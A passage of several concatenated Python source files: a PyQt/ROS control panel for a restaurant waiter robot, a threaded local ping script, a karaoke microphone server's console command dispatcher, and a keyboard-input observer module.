        self.max_tray()
    elif not table_num or self.check_tray(content):
        table_num.append(["t5", content])
    else:
        self.duplicateError()
def table6_button(self):
    """Assign the tray chosen in comboBox_6 to table 6 (entry "t6")."""
    global table_num
    content = self.comboBox_6.currentText()
    if content == "Select":
        # No tray picked yet.
        self.selectError()
    elif len(table_num) > 5:
        # table_num keeps a leading dummy entry (see reset), so >5 means
        # five real orders are already queued.
        self.max_tray()
    elif self.check_tray(content):
        # check_tray returns True for an empty table_num, so the original
        # "(table_num and check) or (not table_num)" collapses to this call.
        table_num.append(["t6", content])
    else:
        self.duplicateError()
def table7_button(self):
    """Assign the tray chosen in comboBox_7 to table 7 (entry "t7")."""
    global table_num
    content = self.comboBox_7.currentText()
    if content == "Select":
        # No tray picked yet.
        self.selectError()
    elif len(table_num) > 5:
        # table_num keeps a leading dummy entry (see reset), so >5 means
        # five real orders are already queued.
        self.max_tray()
    elif self.check_tray(content):
        # check_tray returns True for an empty table_num, so the original
        # "(table_num and check) or (not table_num)" collapses to this call.
        table_num.append(["t7", content])
    else:
        self.duplicateError()
def table8_button(self):
    """Assign the tray chosen in comboBox_8 to table 8 (entry "t8")."""
    global table_num
    content = self.comboBox_8.currentText()
    if content == "Select":
        # No tray picked yet.
        self.selectError()
    elif len(table_num) > 5:
        # table_num keeps a leading dummy entry (see reset), so >5 means
        # five real orders are already queued.
        self.max_tray()
    elif self.check_tray(content):
        # check_tray returns True for an empty table_num, so the original
        # "(table_num and check) or (not table_num)" collapses to this call.
        table_num.append(["t8", content])
    else:
        self.duplicateError()
def table9_button(self):
    """Assign the tray chosen in comboBox_9 to table 9 (entry "t9")."""
    global table_num
    content = self.comboBox_9.currentText()
    if content == "Select":
        # No tray picked yet.
        self.selectError()
    elif len(table_num) > 5:
        # table_num keeps a leading dummy entry (see reset), so >5 means
        # five real orders are already queued.
        self.max_tray()
    elif self.check_tray(content):
        # check_tray returns True for an empty table_num, so the original
        # "(table_num and check) or (not table_num)" collapses to this call.
        table_num.append(["t9", content])
    else:
        self.duplicateError()
def reset(self):
    """Clear all table-to-tray assignments and reset the tray selectors.

    table_num is re-initialised to [[]]: the leading empty list is a dummy
    placeholder (go_table_button iterates from index 1).
    """
    global table_num
    table_num = [[]]
    # Every tray combo box goes back to its "Select" placeholder.
    tray_combos = (self.comboBox, self.comboBox_2, self.comboBox_3,
                   self.comboBox_4, self.comboBox_5, self.comboBox_6,
                   self.comboBox_7, self.comboBox_8, self.comboBox_9)
    for combo in tray_combos:
        combo.setCurrentText("Select")
def go_table_thread(self):
    """Run go_table_button on a worker thread so the Qt UI stays responsive."""
    worker = Thread(target=self.go_table_button)
    worker.start()
def go_table_button(self):
    """Deliver every queued order: drive to each assigned table in turn,
    ask the operator to confirm delivery, then return to the kitchen and
    clear the assignments.

    Runs on a worker thread (see go_table_thread); self.stop_flag aborts
    the remaining navigation when the emergency stop fires.
    """
    global table_num, table_cor
    # Index 0 of table_num is a dummy placeholder, so real orders start at 1.
    for t in range(1, len(table_num)):
        for i in range(len(table_cor)):
            # table_cor[i] appears to be [table_id, x, y] -- defined
            # elsewhere in the file; TODO confirm against its definition.
            if (table_num[t][0] == table_cor[i][0]) and (not self.stop_flag):
                # Blocking drive to the matched table's coordinates.
                self.movebase_client(table_cor[i][1], table_cor[i][2])
                if not self.stop_flag:
                    # Wait for the operator to acknowledge the delivery.
                    msg = QtWidgets.QMessageBox()
                    msg.setText("Table Number "+str(i+1)+" order is in "+table_num[t][1]+"\nDelivery Completed?")
                    msg.setWindowTitle("Status")
                    msg.setStandardButtons(QtWidgets.QMessageBox.Ok | QtWidgets.QMessageBox.Cancel)
                    retval = msg.exec_()
                else:
                    # Emergency stop fired while driving: skip confirmation.
                    pass
    # All deliveries done (or aborted): head back to the kitchen coordinates.
    if not self.stop_flag:
        self.movebase_client(kitchen[0], kitchen[1])
    self.reset()
def return_kitchen_thread(self):
    """Run return_kitchen_button on a worker thread (UI stays responsive)."""
    worker = Thread(target=self.return_kitchen_button)
    worker.start()
def return_kitchen_button(self):
    """Drop all current assignments and drive back to the kitchen."""
    self.reset()
    # Clear the emergency-stop flag *before* navigating so the drive is not
    # skipped (the other navigation paths check stop_flag first).
    self.stop_flag = False
    # kitchen = (x, y) drive target defined at module level -- not visible here.
    self.movebase_client(kitchen[0], kitchen[1])
def battery_low_thread(self):
    """Run battery_low_button on a worker thread (UI stays responsive)."""
    worker = Thread(target=self.battery_low_button)
    worker.start()
def battery_low_button(self):
    """Simulate a low battery: force the level to 10% and drive to the dock."""
    global battery
    battery = 10
    self.label_12.setText("10%")
    # charge = (x, y) charging-dock coordinates defined at module level --
    # not visible here.
    self.movebase_client(charge[0], charge[1])
def battery_status_thread(self):
    """Run the battery_status drain loop on a background thread."""
    worker = Thread(target=self.battery_status)
    worker.start()
def battery_status(self):
    """Background battery simulation: drain 1% every 20 seconds.

    While the level is <= 10%, each loop pass (re)sends a drive command to
    the charging dock. When the level falls below 0 the loop exits, the
    emergency flag is raised and the active move_base goal is cancelled.
    """
    global battery
    while battery>=0:
        if battery <=10:
            # NOTE(review): this re-issues the dock drive on *every* 20 s
            # tick while low -- presumably intentional, but confirm.
            self.movebase_client(charge[0], charge[1])
        time.sleep(20)
        battery=battery-1
        self.label_12.setText(str(battery)+"%")
    # Battery exhausted: block further navigation and cancel the current goal.
    self.stop_flag = True
    handle = Popen('rostopic pub /move_base/cancel actionlib_msgs/GoalID -- {}', shell=True)
def b_cam_thread(self):
    """Launch the bottom-camera viewer from a worker thread."""
    worker = Thread(target=self.b_cam_button)
    worker.start()
def b_cam_button(self):
    """Open an image_view window showing the bottom front camera topic.

    The viewer runs as a detached child process; the Popen handle was
    previously bound to an unused local, which is dropped here.
    """
    Popen('rosrun image_view image_view image:=/b_camera/color/image_raw', shell=True)
def u_cam_thread(self):
    """Launch the top-camera viewer from a worker thread."""
    worker = Thread(target=self.u_cam_button)
    worker.start()
def u_cam_button(self):
    """Open an image_view window showing the front camera topic.

    The viewer runs as a detached child process; the Popen handle was
    previously bound to an unused local, which is dropped here.
    """
    Popen('rosrun image_view image_view image:=/f_camera/color/image_raw', shell=True)
def setupUi(self, waiter_bot):
    """Build the control-panel UI and wire its signals.

    Originally Qt-Designer-generated code; the heavily duplicated widget
    setup is collapsed into data-driven loops. Widget creation order,
    objectNames, geometry, fonts and icon assignments are preserved, so
    connectSlotsByName and the focus/tab order behave as before.
    """
    icon_dir = "/home/adip/catkin_ws/src/waiter_bot_description/src/"

    def _icon(file_name):
        # Build a QIcon from a pixmap in the package's src directory.
        ic = QtGui.QIcon()
        ic.addPixmap(QtGui.QPixmap(icon_dir + file_name), QtGui.QIcon.Normal, QtGui.QIcon.Off)
        return ic

    waiter_bot.setObjectName("waiter_bot")
    waiter_bot.resize(669, 808)
    # --- Title banner ---
    self.label = QtWidgets.QLabel(waiter_bot)
    self.label.setGeometry(QtCore.QRect(0, 10, 651, 41))
    font = QtGui.QFont()
    font.setFamily("Tibetan Machine Uni")
    font.setPointSize(20)
    font.setBold(True)
    font.setWeight(75)
    self.label.setFont(font)
    self.label.setLayoutDirection(QtCore.Qt.LeftToRight)
    self.label.setTextFormat(QtCore.Qt.RichText)
    self.label.setAlignment(QtCore.Qt.AlignCenter)
    self.label.setObjectName("label")
    # --- Battery panel (left column) ---
    self.verticalLayoutWidget_3 = QtWidgets.QWidget(waiter_bot)
    self.verticalLayoutWidget_3.setGeometry(QtCore.QRect(10, 60, 171, 181))
    self.verticalLayoutWidget_3.setObjectName("verticalLayoutWidget_3")
    self.verticalLayout_3 = QtWidgets.QVBoxLayout(self.verticalLayoutWidget_3)
    self.verticalLayout_3.setContentsMargins(0, 9, 0, 0)
    self.verticalLayout_3.setObjectName("verticalLayout_3")
    self.label_2 = QtWidgets.QLabel(self.verticalLayoutWidget_3)
    self.label_2.setMinimumSize(QtCore.QSize(0, 29))
    self.label_2.setMaximumSize(QtCore.QSize(157, 23))
    font = QtGui.QFont()
    font.setPointSize(18)
    self.label_2.setFont(font)
    self.label_2.setAlignment(QtCore.Qt.AlignCenter)
    self.label_2.setObjectName("label_2")
    self.verticalLayout_3.addWidget(self.label_2)
    self.label_12 = QtWidgets.QLabel(self.verticalLayoutWidget_3)
    self.label_12.setMinimumSize(QtCore.QSize(0, 74))
    self.label_12.setMaximumSize(QtCore.QSize(164, 91))
    font = QtGui.QFont()
    font.setPointSize(16)
    self.label_12.setFont(font)
    self.label_12.setAlignment(QtCore.Qt.AlignCenter)
    self.label_12.setObjectName("label_12")
    self.verticalLayout_3.addWidget(self.label_12)
    self.battery_low = QtWidgets.QPushButton(self.verticalLayoutWidget_3)
    self.battery_low.setMinimumSize(QtCore.QSize(0, 0))
    self.battery_low.setMaximumSize(QtCore.QSize(165, 37))
    self.battery_low.setObjectName("battery_low")
    self.verticalLayout_3.addWidget(self.battery_low)
    # --- Tab container ---
    self.tabWidget = QtWidgets.QTabWidget(waiter_bot)
    self.tabWidget.setGeometry(QtCore.QRect(190, 60, 471, 741))
    self.tabWidget.setMinimumSize(QtCore.QSize(0, 0))
    font = QtGui.QFont()
    font.setFamily("Tibetan Machine Uni")
    font.setPointSize(14)
    self.tabWidget.setFont(font)
    self.tabWidget.setCursor(QtGui.QCursor(QtCore.Qt.ArrowCursor))
    self.tabWidget.setAutoFillBackground(False)
    self.tabWidget.setObjectName("tabWidget")
    # --- Tab 1: table navigation ---
    self.table_navigation = QtWidgets.QWidget()
    self.table_navigation.setObjectName("table_navigation")
    self.gridLayoutWidget_2 = QtWidgets.QWidget(self.table_navigation)
    self.gridLayoutWidget_2.setGeometry(QtCore.QRect(10, 0, 461, 690))
    self.gridLayoutWidget_2.setObjectName("gridLayoutWidget_2")
    self.gridLayout_2 = QtWidgets.QGridLayout(self.gridLayoutWidget_2)
    self.gridLayout_2.setContentsMargins(0, 0, 0, 0)
    self.gridLayout_2.setVerticalSpacing(0)
    self.gridLayout_2.setObjectName("gridLayout_2")
    table_icon = _icon("table.png")
    # (attr name, icon, max height, icon size, grid row, grid col) --
    # original (generated) creation order kept so focus order is unchanged.
    nav_buttons = (
        ("table6", table_icon, 92, 60, 3, 2),
        ("table7", table_icon, 92, 60, 6, 0),
        ("table1", table_icon, 92, 60, 0, 0),
        ("go_table", _icon("go.png"), 71, 70, 9, 2),
        ("table4", table_icon, 92, 60, 3, 0),
        ("return_kitchen", _icon("return.png"), 71, 60, 9, 0),
        ("table9", table_icon, 92, 60, 6, 2),
        ("table3", table_icon, 92, 60, 0, 2),
        ("table8", table_icon, 92, 60, 6, 1),
        ("table2", table_icon, 92, 60, 0, 1),
        ("table5", table_icon, 92, 60, 3, 1),
    )
    for name, ic, max_h, icon_px, row, col in nav_buttons:
        btn = QtWidgets.QPushButton(self.gridLayoutWidget_2)
        btn.setMinimumSize(QtCore.QSize(0, 88))
        btn.setMaximumSize(QtCore.QSize(101, max_h))
        btn.setText("")
        btn.setIcon(ic)
        btn.setIconSize(QtCore.QSize(icon_px, icon_px))
        btn.setObjectName(name)
        setattr(self, name, btn)
        self.gridLayout_2.addWidget(btn, row, col, 1, 1)
    # Table caption labels under each button row.
    nav_labels = (
        ("label_3", 2, 0), ("label_6", 5, 0), ("label_8", 5, 2),
        ("label_5", 2, 2), ("label_4", 2, 1), ("label_7", 5, 1),
        ("label_9", 8, 0), ("label_10", 8, 1), ("label_11", 8, 2),
    )
    for name, row, col in nav_labels:
        lab = QtWidgets.QLabel(self.gridLayoutWidget_2)
        lab.setMinimumSize(QtCore.QSize(0, 23))
        lab.setMaximumSize(QtCore.QSize(96, 12))
        lab.setAlignment(QtCore.Qt.AlignCenter)
        lab.setObjectName(name)
        setattr(self, name, lab)
        self.gridLayout_2.addWidget(lab, row, col, 1, 1)
    self.start_auto_nav = QtWidgets.QPushButton(self.gridLayoutWidget_2)
    self.start_auto_nav.setObjectName("start_auto_nav")
    self.gridLayout_2.addWidget(self.start_auto_nav, 9, 1, 1, 1)
    # Tray selector combo boxes (6 empty items each; text set in retranslateUi).
    tray_combos = (
        ("comboBox_5", 4, 1), ("comboBox_6", 4, 2), ("comboBox_3", 1, 1),
        ("comboBox_4", 4, 0), ("comboBox_2", 1, 2), ("comboBox", 1, 0),
        ("comboBox_7", 7, 0), ("comboBox_8", 7, 1), ("comboBox_9", 7, 2),
    )
    for name, row, col in tray_combos:
        box = QtWidgets.QComboBox(self.gridLayoutWidget_2)
        box.setMinimumSize(QtCore.QSize(0, 30))
        box.setMaximumSize(QtCore.QSize(100, 30))
        box.setObjectName(name)
        for _ in range(6):
            box.addItem("")
        setattr(self, name, box)
        self.gridLayout_2.addWidget(box, row, col, 1, 1)
    self.tabWidget.addTab(self.table_navigation, "")
    # --- Tab 2: manual control (3x3 direction pad) ---
    self.manual_control = QtWidgets.QWidget()
    self.manual_control.setObjectName("manual_control")
    self.gridLayoutWidget = QtWidgets.QWidget(self.manual_control)
    self.gridLayoutWidget.setGeometry(QtCore.QRect(0, 70, 461, 471))
    self.gridLayoutWidget.setObjectName("gridLayoutWidget")
    self.gridLayout = QtWidgets.QGridLayout(self.gridLayoutWidget)
    self.gridLayout.setContentsMargins(0, 0, 0, 0)
    self.gridLayout.setObjectName("gridLayout")
    # The stop icon is shared with the emergency_stop button below.
    stop_icon = _icon("stop.png")
    # NOTE(review): LB uses "right down.png" and RB uses "left down.png" in
    # the original generated code -- preserved as-is.
    drive_buttons = (
        ("F", _icon("up arrow.png"), 0, 1),
        ("stop", stop_icon, 1, 1),
        ("LF", _icon("left up.png"), 0, 0),
        ("B", _icon("down arrow.png"), 2, 1),
        ("RF", _icon("right up.png"), 0, 2),
        ("LB", _icon("right down.png"), 2, 0),
        ("RB", _icon("left down.png"), 2, 2),
        ("L", _icon("left arrow.png"), 1, 0),
        ("R", _icon("right arrow.png"), 1, 2),
    )
    for name, ic, row, col in drive_buttons:
        btn = QtWidgets.QPushButton(self.gridLayoutWidget)
        btn.setMinimumSize(QtCore.QSize(0, 100))
        btn.setMaximumSize(QtCore.QSize(102, 100))
        btn.setText("")
        btn.setIcon(ic)
        btn.setIconSize(QtCore.QSize(60, 60))
        btn.setObjectName(name)
        setattr(self, name, btn)
        self.gridLayout.addWidget(btn, row, col, 1, 1)
    # Extra (default-valued) properties the generator emitted for LF only.
    self.LF.setAutoDefault(False)
    self.LF.setDefault(False)
    self.LF.setFlat(False)
    self.tabWidget.addTab(self.manual_control, "")
    # --- Tab 3: mapping ---
    self.mapping = QtWidgets.QWidget()
    self.mapping.setObjectName("mapping")
    self.verticalLayoutWidget_2 = QtWidgets.QWidget(self.mapping)
    self.verticalLayoutWidget_2.setGeometry(QtCore.QRect(100, 50, 291, 381))
    self.verticalLayoutWidget_2.setObjectName("verticalLayoutWidget_2")
    self.verticalLayout_2 = QtWidgets.QVBoxLayout(self.verticalLayoutWidget_2)
    self.verticalLayout_2.setContentsMargins(0, 0, 0, 0)
    self.verticalLayout_2.setObjectName("verticalLayout_2")
    for name in ("manual_map", "autonomous_map", "map_view"):
        btn = QtWidgets.QPushButton(self.verticalLayoutWidget_2)
        btn.setMinimumSize(QtCore.QSize(0, 100))
        btn.setObjectName(name)
        setattr(self, name, btn)
        self.verticalLayout_2.addWidget(btn)
    self.tabWidget.addTab(self.mapping, "")
    # --- Emergency stop (left column) ---
    self.emergency_stop = QtWidgets.QPushButton(waiter_bot)
    self.emergency_stop.setGeometry(QtCore.QRect(20, 300, 141, 100))
    self.emergency_stop.setMinimumSize(QtCore.QSize(0, 100))
    self.emergency_stop.setText("")
    self.emergency_stop.setIcon(stop_icon)
    self.emergency_stop.setIconSize(QtCore.QSize(65, 65))
    self.emergency_stop.setObjectName("emergency_stop")
    # --- Camera panel (left column) ---
    self.verticalLayoutWidget = QtWidgets.QWidget(waiter_bot)
    self.verticalLayoutWidget.setGeometry(QtCore.QRect(10, 450, 160, 211))
    self.verticalLayoutWidget.setObjectName("verticalLayoutWidget")
    self.verticalLayout = QtWidgets.QVBoxLayout(self.verticalLayoutWidget)
    self.verticalLayout.setContentsMargins(0, 0, 0, 0)
    self.verticalLayout.setObjectName("verticalLayout")
    self.label_13 = QtWidgets.QLabel(self.verticalLayoutWidget)
    self.label_13.setMinimumSize(QtCore.QSize(0, 50))
    self.label_13.setMaximumSize(QtCore.QSize(16777215, 50))
    font = QtGui.QFont()
    font.setFamily("URW Bookman L")
    font.setPointSize(15)
    self.label_13.setFont(font)
    self.label_13.setAlignment(QtCore.Qt.AlignCenter)
    self.label_13.setObjectName("label_13")
    self.verticalLayout.addWidget(self.label_13)
    for name in ("bottom_front_cam", "up_front_cam"):
        btn = QtWidgets.QPushButton(self.verticalLayoutWidget)
        btn.setMinimumSize(QtCore.QSize(0, 62))
        btn.setMaximumSize(QtCore.QSize(16777215, 61))
        btn.setObjectName(name)
        setattr(self, name, btn)
        self.verticalLayout.addWidget(btn)
    self.retranslateUi(waiter_bot)
    self.tabWidget.setCurrentIndex(0)
    QtCore.QMetaObject.connectSlotsByName(waiter_bot)
    # --- Signal wiring: manual control of the bot ---
    for btn in (self.LF, self.F, self.RF, self.R, self.stop,
                self.L, self.LB, self.B, self.RB):
        btn.released.connect(self.button_released)
    pressed_handlers = (
        (self.LF, self.fl_button_pressed), (self.F, self.f_button_pressed),
        (self.RF, self.fr_button_pressed), (self.R, self.r_button_pressed),
        (self.stop, self.stop_button_pressed), (self.L, self.l_button_pressed),
        (self.LB, self.bl_button_pressed), (self.B, self.b_button_pressed),
        (self.RB, self.br_button_pressed),
    )
    for btn, handler in pressed_handlers:
        btn.pressed.connect(handler)
    # --- Signal wiring: mapping, navigation and misc buttons ---
    self.manual_map.clicked.connect(self.manual_map_thread)
    self.autonomous_map.clicked.connect(self.autonomous_map_thread)
    self.start_auto_nav.clicked.connect(self.start_auto_nav_thread)
    self.map_view.clicked.connect(self.map_view_thread)
    self.emergency_stop.clicked.connect(self.emergency_stop_thread)
    table_handlers = (
        (self.table1, self.table1_button), (self.table2, self.table2_button),
        (self.table3, self.table3_button), (self.table4, self.table4_button),
        (self.table5, self.table5_button), (self.table6, self.table6_button),
        (self.table7, self.table7_button), (self.table8, self.table8_button),
        (self.table9, self.table9_button),
    )
    for btn, handler in table_handlers:
        btn.clicked.connect(handler)
    self.go_table.clicked.connect(self.go_table_thread)
    self.return_kitchen.clicked.connect(self.return_kitchen_thread)
    self.battery_low.clicked.connect(self.battery_low_thread)
    self.bottom_front_cam.clicked.connect(self.b_cam_thread)
    self.up_front_cam.clicked.connect(self.u_cam_thread)
    # Start the background battery drain simulation immediately.
    self.battery_status_thread()
def retranslateUi(self, waiter_bot):
    """Apply all user-visible strings (collapsed from generated per-widget
    calls into loops; the set of (widget, string) pairs is unchanged)."""
    global battery
    _translate = QtCore.QCoreApplication.translate
    # Typo fix: original title said "Control Pannel".
    waiter_bot.setWindowTitle(_translate("waiter_bot", "Control Panel"))
    self.label.setText(_translate("waiter_bot", "RMP Waiter Bot Control"))
    self.label_2.setText(_translate("waiter_bot", "Battery Level"))
    # battery is the module-level simulated charge percentage.
    self.label_12.setText(_translate("waiter_bot", str(battery)+"%"))
    self.battery_low.setText(_translate("waiter_bot", "Battery Low"))
    table_labels = (
        (self.label_3, "Table 1"), (self.label_4, "Table 2"),
        (self.label_5, "Table 3"), (self.label_6, "Table 4"),
        (self.label_7, "Table 5"), (self.label_8, "Table 6"),
        (self.label_9, "Table 7"), (self.label_10, "Table 8"),
        (self.label_11, "Table 9"),
    )
    for label, text in table_labels:
        label.setText(_translate("waiter_bot", text))
    self.start_auto_nav.setText(_translate("waiter_bot", "Start"))
    # Every tray combo box gets the same six item texts.
    tray_names = ("Select", "Tray 1", "Tray 2", "Tray 3", "Tray 4", "Tray 5")
    tray_combos = (self.comboBox, self.comboBox_2, self.comboBox_3,
                   self.comboBox_4, self.comboBox_5, self.comboBox_6,
                   self.comboBox_7, self.comboBox_8, self.comboBox_9)
    for combo in tray_combos:
        for index, text in enumerate(tray_names):
            combo.setItemText(index, _translate("waiter_bot", text))
    self.tabWidget.setTabText(self.tabWidget.indexOf(self.table_navigation), _translate("waiter_bot", "Table Navigation"))
    self.tabWidget.setTabText(self.tabWidget.indexOf(self.manual_control), _translate("waiter_bot", "Manual Control"))
    self.manual_map.setText(_translate("waiter_bot", "Manual"))
    self.autonomous_map.setText(_translate("waiter_bot", "Autonomous"))
    self.map_view.setText(_translate("waiter_bot", "Map View / Save"))
    self.tabWidget.setTabText(self.tabWidget.indexOf(self.mapping), _translate("waiter_bot", "Mapping"))
    self.label_13.setText(_translate("waiter_bot", "Camera View"))
    self.bottom_front_cam.setText(_translate("waiter_bot", "Bottom Front"))
    self.up_front_cam.setText(_translate("waiter_bot", "Top Front"))
if __name__ == "__main__":
    import sys
    # ROS node and cmd_vel publisher must exist before UI callbacks fire.
    rospy.init_node('waiter_bot_controller')
    move_pub = rospy.Publisher('cmd_vel', Twist, queue_size=1)
    app = QtWidgets.QApplication(sys.argv)
    waiter_bot = QtWidgets.QWidget()
    ui = Ui_waiter_bot()
    ui.setupUi(waiter_bot)
    waiter_bot.show()
    # The original called sys.exit(app.exec_()) first, which raises SystemExit
    # and made cv2.destroyAllWindows() unreachable. Run cleanup, then exit.
    exit_code = app.exec_()
    cv2.destroyAllWindows()
    sys.exit(exit_code)
event.py | #!/usr/bin/env python
from threading import Thread
import subprocess
from Queue import Queue
import time
num_threads = 3
queue = Queue()
ips = ["10.0.1.1", "10.0.1.3", "10.0.1.11", "10.0.1.51"]
def pinger(i, q):
    """Worker loop: take IP addresses from *q* and ping each one once.

    i -- worker index, used only in the progress message.
    q -- Queue of IP address strings; the loop runs forever (the thread
         is a daemon) and calls q.task_done() after each address.
    """
    # Open /dev/null once for the whole loop; the original opened a new
    # file object on every ping and never closed it, leaking descriptors.
    devnull = open('/dev/null', 'w')
    while True:
        ip = q.get()
        print("Thread %s: Pinging %s" % (i, ip))
        # Pass argv as a list: no shell process per ping and no risk of
        # shell injection through the address string.
        ret = subprocess.call(["ping", "-c", "1", ip],
                              stdout=devnull,
                              stderr=subprocess.STDOUT)
        if ret == 0:
            print("%s: is alive" % ip)
        else:
            print("%s: did not respond" % ip)
        q.task_done()
# Spawn the daemon worker pool, feed it the address list, then block
# until every queued IP has been processed.
for i in range(num_threads):
    worker = Thread(target=pinger, args=(i, queue))
    # daemon attribute instead of the deprecated setDaemon(); workers
    # must not keep the interpreter alive once main exits.
    worker.daemon = True
    worker.start()
for ip in ips:
    queue.put(ip)
print("Main Thread Waiting")
queue.join()
print("Done")
main.py | import threading, signal, logging, shlex, traceback
from singstarmic.discoveryserver import DiscoveryServer
from singstarmic.appserver import AppServer
from singstarmic.catalogueserver import CatalogueServer
logging.basicConfig(level=logging.INFO)
log = logging.getLogger(__name__)
class MicServer:
    """Coordinates a set of sub-servers, each running on its own thread,
    and dispatches interactive console commands to them."""

    def __init__(self):
        # Instance state: the original used mutable *class* attributes
        # (notably ``servers = {}``), which would be shared between all
        # MicServer instances.
        self.is_running = False
        # lowercased server class name -> (server, thread)
        self.servers = {}

    def addServer(self, server):
        """Register *server* (an object exposing run()/stop()) and return
        self so calls can be chained."""
        thread = threading.Thread(target=server.run)
        thread.name = server.__class__.__name__
        self.servers[thread.name.lower()] = (server, thread)
        return self

    def stop(self, signal=None, frame=None):
        """Stop every registered server and join its thread.

        The (signal, frame) parameters let this double as a signal
        handler (see the SIGINT registration at module level)."""
        self.is_running = False
        while self.servers:
            (_, (server, thread)) = self.servers.popitem()
            log.info('Stopping ' + thread.name)
            server.stop()
            thread.join()
        log.info('All servers stopped...')

    def command(self, text):
        """Parse one console line and invoke the named method on self, or
        on a registered server when the first token names one."""
        lex = shlex.shlex(text.strip())
        lex.quotes = '"'
        lex.whitespace_split = True
        lex.commenters = ''
        arguments = list(lex)
        if len(arguments) > 0:
            # Check if we are targeting this or some other module
            target = self
            if arguments[0].lower() in self.servers:
                target = self.servers[arguments.pop(0).lower()][0]
            # Check if we have this command
            command = arguments.pop(0)
            if not hasattr(target, command):
                log.warning('Command `{0:s}` is not supported by module {1:s}'.format(command, target.__class__.__name__))
                return
            # Run command
            try:
                # SECURITY: eval() on console input executes arbitrary
                # code -- acceptable only because this is a local PoC.
                arguments = [eval(argument) for argument in arguments]
                getattr(target, command)(*arguments)
            except Exception as e:
                log.error(e)

    def run(self):
        """Start all registered server threads, then read commands from
        stdin until stop() clears is_running."""
        self.is_running = True
        # Run all servers
        for _, (_, thread) in self.servers.items():
            thread.start()
        # Run command loop
        log.info('All servers started')
        while self.is_running:
            self.command(input(''))
        log.info('Done')

    def exit(self):
        """Console-accessible alias for stop()."""
        self.stop()
# Module-level wiring: one MicServer owning the three sub-servers, with
# SIGINT routed to MicServer.stop for a clean shutdown.
micServer = MicServer()
signal.signal(signal.SIGINT, micServer.stop)
try:
    discoveryServer = DiscoveryServer('Karaoke Party!')
    catalogueServer = CatalogueServer()
    appServer = AppServer()
    # Do some linking
    catalogueServer.onPlaylistChanged(appServer.refreshPlaylist)
    # Add all different server parts
    micServer.addServer(discoveryServer).addServer(catalogueServer).addServer(appServer)
    # Run the whole thing
    micServer.run()
except Exception as e:
    micServer.stop(None, None)
    # EOFError just means stdin closed (normal end of the command loop);
    # anything else gets logged with its traceback.
    if not isinstance(e, EOFError):
        log.exception("")
|
keyboard.py | """Support for keyboard interaction.
Python has only little support for direct keyboard interactions. Most
functions are operating system dependent or provided by third party
libraries (like `getch`). The main goal of this module is to provide
a uniform API that can be used to detect individual keystrokes.
"""
# standard imports
from typing import Type, Optional, Iterable
from types import TracebackType
from threading import Thread
import sys
import select
import logging
# logging
LOG = logging.getLogger(__name__)
class KeyboardObserver:
    """Functionality for checking key presses. This may be used in
    loops to stop the loop when a key is pressed.

    .. highlight:: python
    .. code-block:: python

        with KeyboardObserver() as key_pressed:
            while not key_pressed:
                ...

    .. highlight:: python
    .. code-block:: python

        stop_on_key = KeyboardObserver()
        for i in stop_on_key(range(1000000)):
            print(i)
    """

    # Background capture thread, or None while no capture is running.
    _thread: Optional[Thread] = None
    # The recorded key press; None until a subclass's _capture_key sets it.
    key_pressed: Optional[str] = None

    def __init__(self, *args, **kwargs) -> None:
        super().__init__(*args, **kwargs)  # type: ignore[call-arg]
        self._thread = None
        self.key_pressed = None

    def __call__(self, iterable) -> Iterable:
        """Wrap *iterable*: yield its items, stopping early once a key
        press has been observed (capturing is active for the duration)."""
        with self:
            for item in iterable:
                yield item
                if self:  # truthy once key_pressed is set
                    break

    def __enter__(self) -> 'KeyboardObserver':
        LOG.info("Entering the KeyboardObserver context manager")
        self.start_capture()
        return self

    def __exit__(self, exc_type: Optional[Type[BaseException]],
                 exc_value: Optional[BaseException],
                 exc_traceback: Optional[TracebackType]) -> None:  # bool
        # Remark: type checker prefers return type None or Literal[False] over
        # bool to signal that the context manager will not swallow exception
        self.stop_capture()
        LOG.info("Leaving the KeyboardObserver context manager")
        # return False  # no exception handling was done in the __exit__ method

    def __bool__(self) -> bool:
        """True once a key press has been recorded."""
        return self.key_pressed is not None

    def start_capture(self) -> None:
        """Start a key capturing process.

        Raises RuntimeError when a capture thread is already running."""
        LOG.debug("KeyboardObserver: starting a capturing thread")
        if self._thread is not None:
            raise RuntimeError("KeyPress is already running")
        # daemon=True: a capture still blocked on input must not keep
        # the interpreter alive at exit.
        self._thread = Thread(target=self._run_capture_key, args=(),
                              name='key_capture_thread', daemon=True)
        self._thread.start()

    def stop_capture(self) -> None:
        """Stop the key capturing process.
        """
        thread = self._thread
        if thread is not None:
            LOG.debug("KeyboardObserver: stopping the capturing thread")
            self._stop_capture()
            thread.join()
            # NOTE(review): _run_capture_key may already have cleared
            # self._thread by now; clearing it again is harmless.
            self._thread = None
            LOG.debug("KeyboardObserver: capturing thread ended.")
        else:
            LOG.debug("KeyboardObserver: no capturing thread is running")

    def _run_capture_key(self) -> None:
        """Run the :py:meth:`capture_key` method and clean up, once it
        finishes.
        """
        self._capture_key()
        self._thread = None
        LOG.info("Finished capturing keys with KeyboardObserver.")

    def _capture_key(self) -> None:
        """Run a loop to capture a key (to be implemented by subclasses).

        Once a key is pressed, this method should set the property
        :py:prop:`key_pressed` and stop.
        """
        # to be implemented by subclasses

    def _stop_capture(self) -> None:
        """Stop the key capturing process (to be implemented by sublcasses).
        """
        # to be implemented by subclasses
class DummyKeyboardObserver(KeyboardObserver):
    """A :py:class:`KeyboardObserver` that uses python's `input` function
    to check for keys. This will only receive a message, once the return
    key is pressed.
    """

    def _capture_key(self) -> None:
        """Block on ``input()`` and record the entered line as the key."""
        self.key_pressed = input()

    def _stop_capture(self) -> None:
        """Ask the user to hit return so the blocked ``input()`` call
        above can finish."""
        print("Please hit the enter key to finish the KeyPress Manager")
class LoopKeyboardObserver(KeyboardObserver):
    """An auxilary :py:class:`KeyboardObserver` running a loop to
    regularly check if a key was pressed.
    """

    def __init__(self, *args, **kwargs) -> None:
        super().__init__(*args, **kwargs)
        # Flag controlling the polling loop in _capture_key.
        self.capture_loop = False

    def _capture_key(self) -> None:
        """Poll :py:meth:`_check_for_key` until a key arrives or the
        loop is switched off via :py:meth:`_stop_capture`."""
        self.capture_loop = True
        while not self.key_pressed and self.capture_loop:
            self._check_for_key()

    def _check_for_key(self, timeout=.1) -> None:
        """Perform one non-blocking check for a key press (subclass hook)."""
        # to be implemented by subclasses

    def _stop_capture(self):
        """Signal the polling loop in :py:meth:`_capture_key` to end."""
        self.capture_loop = False
class SelectKeyboardObserver(LoopKeyboardObserver):
    """A :py:class:`KeyboardObserver` using the (standard) `select` module
    to check if a key was pressed.

    Note: select() on sys.stdin only works on POSIX terminals, and a key
    only becomes readable after return is pressed.
    """

    def _check_for_key(self, timeout=.1) -> None:
        """Check if a key was pressed, waiting at most *timeout* seconds.
